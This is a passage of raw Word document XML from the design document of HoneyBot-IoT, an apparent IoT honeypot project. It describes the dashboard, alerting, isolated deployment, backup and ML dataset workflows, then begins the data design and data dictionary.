        <w:t xml:space="preserve">: Activity Diagram of Threat Report and STIX 2.1 Export (M4)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9106" w:name="_Toc9106"/>
      <w:r>
        <w:t xml:space="preserve">Activity Diagram — Real-Time Dashboard Update over WebSocket (M5)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9106"/>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The analyst authenticates once at Nginx; the React single-page dashboard then loads its data through the REST API and opens a WebSocket. The API relays the Redis channels honeybot:events, honeybot:detections and honeybot:state to the browser, which updates the live feed and detections immediately, shows a notification for HIGH and CRITICAL detections and re-fetches aggregate widgets at most every three seconds. If the socket drops, the dashboard keeps polling and reconnects with exponential back-off.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="6473613"/>
            <wp:docPr id="16" name="Picture 16"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ad5_dashboard_live.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9005"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="6473613"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">13</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Activity Diagram of the Real-Time Dashboard Update (M5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9107" w:name="_Toc9107"/>
      <w:r>
        <w:t xml:space="preserve">Activity Diagram — Alert Notification with Threshold, De-duplication and Escalation (M6)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9107"/>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">New detections are processed strongest first. A detection is notified only if its type is enabled and its severity reaches the threshold in alerts.yaml. Within the ten-minute window a further alert for the same IP is sent only if it is more severe (escalation); otherwise it is recorded as suppressed. Telegram and e-mail are attempted independently, and every outcome (sent, failed, disabled or suppressed) is written to the alerts table, so the alert log on the dashboard is complete.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="5114395"/>
            <wp:docPr id="17" name="Picture 17"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ad6_alerts.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9006"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="5114395"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">14</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Activity Diagram of Alert Notification (M6)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9108" w:name="_Toc9108"/>
      <w:r>
        <w:t xml:space="preserve">Activity Diagram — Secure Deployment and Network Isolation Start-up (M7)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9108"/>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The command docker compose up starts the stack in a fixed order. The firewall service inserts the isolation rules into Docker's DOCKER-USER chain, and the honeypots start only after both the database and the firewall report healthy, so an attacker can never reach a honeypot that is able to connect out. The API and the engine migrate the schema in place under an advisory lock, Nginx starts once the bcrypt password file exists and the API is healthy, and the firewall re-checks its rules every 30 seconds for as long as the stack runs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="6303354"/>
            <wp:docPr id="18" name="Picture 18"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ad7_deployment.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9007"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="6303354"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">15</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Activity Diagram of Secure Deployment and Isolation Start-up (M7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9109" w:name="_Toc9109"/>
      <w:r>
        <w:t xml:space="preserve">Activity Diagram — Backup, Verification and Restore (M7)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9109"/>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The backup service writes a PostgreSQL dump and an archive of the quarantined samples at a fixed interval, protects both with a SHA-256 manifest and keeps only the newest sets. The same script verifies a set on demand and restores it only after its checksums match; samples are restored only when their volume is mounted writable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760720" cy="4671573"/>
            <wp:docPr id="19" name="Picture 19"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ad8_backup.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9008"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760720" cy="4671573"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">16</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Activity Diagram of Backup, Verification and Restore (M7)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9110" w:name="_Toc9110"/>
      <w:r>
        <w:t xml:space="preserve">Activity Diagram — ML Dataset Preparation with Weak Labels (M8)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9110"/>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This is the part of Module 8 delivered at 70% (WBS 10.1). One feature vector is built per attacker session from the unified events table, and a weak label is derived from the rule detections that touch the session, using the scope's six classes and a fixed priority when several apply. The labelled dataset is the training input for the XGBoost classifier and Isolation Forest of the 100% milestone, which are modelled in Figure 5.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4466037" cy="6949440"/>
            <wp:docPr id="20" name="Picture 20"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="ad9_ml_dataset.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9009"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4466037" cy="6949440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRDefault="005C6601" w:rsidP="006238CF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">17</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Activity Diagram of ML Dataset Preparation (M8)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC7BC08" w14:textId="2205920E" w:rsidR="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9011" w:name="_Toc69011"/>
      <w:r>
        <w:t xml:space="preserve">5. Data Design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9011"/>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The information domain of HoneyBot-IoT is the stream of actions an attacker performs against the emulated devices. It is transformed into data in three steps. First, every TCP connection becomes a Session object and one row in sessions. Second, every action inside that connection (login, command, HTTP request, MQTT publish, RTSP request, download, state change) becomes one row in events, with the protocol-specific details kept in a JSONB column. Third, the Threat Intelligence Engine derives higher-level records from the events: detections, attackers, campaigns, IOCs and the alert log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The design replaces the per-protocol tables of the 30% build with one unified event store. This lets a single query, rule or dashboard widget work across all five protocols. The old table names are kept as SQL views, so earlier queries still work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The system uses the following databases and data storage items:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">PostgreSQL 16 (volume pgdata)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — the ten tables of the data dictionary and five compatibility views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Redis 7.2 (in memory, no persistence)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — device:cctv, device:smartlock and device:sensor hashes, the history:sensor and changes:* lists, the honeybot:events, honeybot:detections and honeybot:state publish/subscribe channels and the service heartbeat keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Volume honey_data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — generated SSH host key and the self-signed TLS certificate of the HTTPS camera panel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Volume captures</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — files attackers upload or write, stored read-only (mode 0400) under their SHA-256, never executed and never served; indexed in file_captures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Folder geoip/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — offline GeoIP city database (DB-IP City Lite or MaxMind GeoLite2, .mmdb format).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD96F05" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">alerts/alerts.yaml and .env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — alert thresholds and secrets (database password, bot token, SMTP account).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003272AD" w:rsidRPr="00BE2A31" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Folder backups/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — SHA-256-verified database dumps and sample archives written by the backup service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Performance and retrieval.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Events are indexed by time, by (ip, time), by session, by (event_type, time) and by (protocol, time), which are exactly the access paths used by the rules and the dashboard. A GIN index on to_tsvector(command ‖ payload) gives full-text search over every command and payload without a second data store. Detections carry a UNIQUE dedupe_key, so a long attack produces one row per time bucket instead of one row per engine pass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF48B6F" w14:textId="54F0A1AE" w:rsidR="003272AD" w:rsidRPr="005C6601" w:rsidRDefault="005C6601" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="9012" w:name="_Toc69012"/>
      <w:r>
        <w:t xml:space="preserve">5.1 Data Dictionary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9012"/>
    </w:p>
    <w:p w14:paraId="7608910A" w14:textId="32DFBA61" w:rsidR="00F0564A" w:rsidRDefault="00F0564A" w:rsidP="00F0564A">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r>
          <w:t xml:space="preserve">9</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Data Dictionary: Entities and Attributes of HoneyBot-IoT (alphabetical)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="10" w:type="dxa"/>
          <w:right w:w="10" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1963"/>
        <w:gridCol w:w="1793"/>
        <w:gridCol w:w="1456"/>
        <w:gridCol w:w="4148"/>
      </w:tblGrid>
      <w:tr w:rsidR="003272AD" w:rsidRPr="007257EA" w14:paraId="089CD904" w14:textId="77777777" w:rsidTr="00A5370F">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1963" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1C45E6E1" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="007257EA" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Entity / Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1793" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="40B707C0" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="007257EA" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Data Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1456" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48B12B90" w14:textId="77777777" w:rsidR="003272AD" w:rsidRPr="007257EA" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Constraint</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4148" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
